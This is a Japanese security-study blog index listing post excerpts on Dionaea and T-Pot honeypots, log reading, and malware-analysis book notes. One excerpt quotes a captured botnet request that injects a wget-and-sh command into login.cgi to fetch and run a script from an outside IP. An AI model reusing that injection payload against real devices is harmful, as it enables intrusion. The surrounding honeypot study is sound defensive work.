セキュリティ系の勉強、その他開発メモとか雑談. GithubはUnity触っていた頃ものがメイン Twitterフォローもよろしくです

マルウェア

dionaea virustotalを有効にする

ふとこの記事が何故か下書きで眠っていました。書きかけだったのでしょうか、、?とりあえず公開しておきます。 導入 Dionaeaのバージョンは0.6.0です。/opt/dionaea/etc/dionaea/ihandlers-available/virustotal.yamlを/opt/dionaea/etc/dionaea/ihandlers-…

【ハニポ】T-potの導入

つい先日までdionaeaを運用していたのですが、急遽T-potを栽培することに。理由は色々ありますが、一番の原因はDionaeaFRが動かなかったこと。(いや動かすところまでは頑張った。。)てことで、前まではVPS上で動いていたハニポを自宅に置きます! 動作環境 $…

HAKAIボットネットからの攻撃と思われるログ(2018-9-24)

短めです。下のログはdionaeaで検知したログ。スペースと改行の表記がうまくできていないのはご了承ください。 stream = [('in', b'GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1\x0…

dionaeaのログをちょっと見てみる2

今回は短く、UPnPのログに関して。 UPnP ウィキペディアさんには、Universal Plug and Play (UPnP)は、機器を接続しただけでコンピュータネットワークに参加することを可能にするプロトコルである。機器をコンピュータに接続するだけで利用可能になるPlug an…

dionaeaのログをちょっと見てみる1

初めに ログを見たり、知識なんてものもない人がゆっくりとログを見ていくだけです。間違ってることの方が多いかもですが、こういうことで慣れていかないといつまで経っても進まないので、、とりあえずhttpの通信記録を少し見てみる。 1 /opt/dionaea/var/di…

dionaeaのサービスを見てみる

とりあえず、公式のこのページを参考に1つずつ見ていけたらなぁと思ってます。 Service — dionaea 0.8.0 documentation その前に 外部からnmapをした時に、dionaeaとバレてしまう可能性があるのでそれを修正します。参考サイトはこちらです。 # nmap ipアド…

dionaeaのVPSのポートがclosedばっかり - ハニーポットのポートが開かない

先日dionaeaをVPSに導入し、早く攻撃来ないかなとか思ってたんですが、全く来ないしログも増えない。すぐにおかしいなと思って、自分(VPS内から)をnmapでポートスキャン。 次に外部(自宅環境)からポートスキャン。 外から見るとポートが閉じてますね。他の方…

今更さくらVPS借りてパニーポット(dionaea)

タイトル通り。 T-Potとかいうdionaeaとかを含んでなおかつログ等もうまい具合に可視化してくれるとかいう高級なものはのちに利用するとして、今回は自分でログとかを見ることを目的にdionaeaを入れます。 VPSを契約する & OS設定 vps.sakura.ad.jp とりあえ…

アナライジングマルウェア 5章 カーネルモード(Ring0)で動作するマルウェアの解析

WinDbgはカーネルモードデバッガ。ゲストOSとパイプで繋ぎ、デバッグを行う。今回触れるものは(アナライジング・マルウェア ―フリーツールを使った感染事案対処 (Art Of Reversing) 出版社: オライリージャパン (2010/12/20) ISBN-10: 4873114551)を読んでの…

2018 ソフトバンク・テクノロジーさんの5daysインターンシップ~マルウェア解析~

の時にメモとかしていた情報をそのままのっけます。MacDownでメモしてたので、見栄えが若干違うかも。。 ひとまずざっくり感想 5日間は長かったですが短かったようにも思えてけど疲れました。(どれ) 最初は知識だけ増えるかなと思って参加しましたが、収穫と…

アナライジングマルウェア 4章コードインジェクションをするマルウェアの解析 メモ

メモリ操作によって、既存のプロセスに新たな感染動作を追加発生させるテクニック。 DLLとして実装されたマルウェアやオンメモリで動作することを前提としたマルウェアの感染動作をこれから列挙。 コードインジェクションの方法 SetWindowsHookEx Windowsに…

アナライジングマルウェア 3動的解析を妨害するマルウェアの解析 メモ

動的解析(ブラックボックス解析)はマルウェアの挙動を容易に把握することができるが、マルウェアはこうした動的解析を妨げるアンチデバッグ機能を持っている。 動的解析のソフトウェア 仮想化ソフトウェア システムリソース監視ツール Process Monitor, Proc…

PEファイルフォーマットについて

PEファイル Windowsの実装ファイルの形式。exe,dll等 ローダがプログラムをロードするのに必要な情報が格納されたヘッダと、プログラムコードやリソースデータが記録されているセクションで構成されている。 RVA(Relative Virtual Address)相対仮想アドレス …

アナライジングマルウェア 1.8動的解析から〜メモ

動的解析を提供するWebサービス VirusTotal 現在(2018.8)も稼働してました。実際にファイルを投げて結果も帰ってきました。ウィルスの名前や感染動作等を取得できます。 VirusTotal - ウイルス、マルウェア、URL の無料オンライン スキャナー マンハイム大学…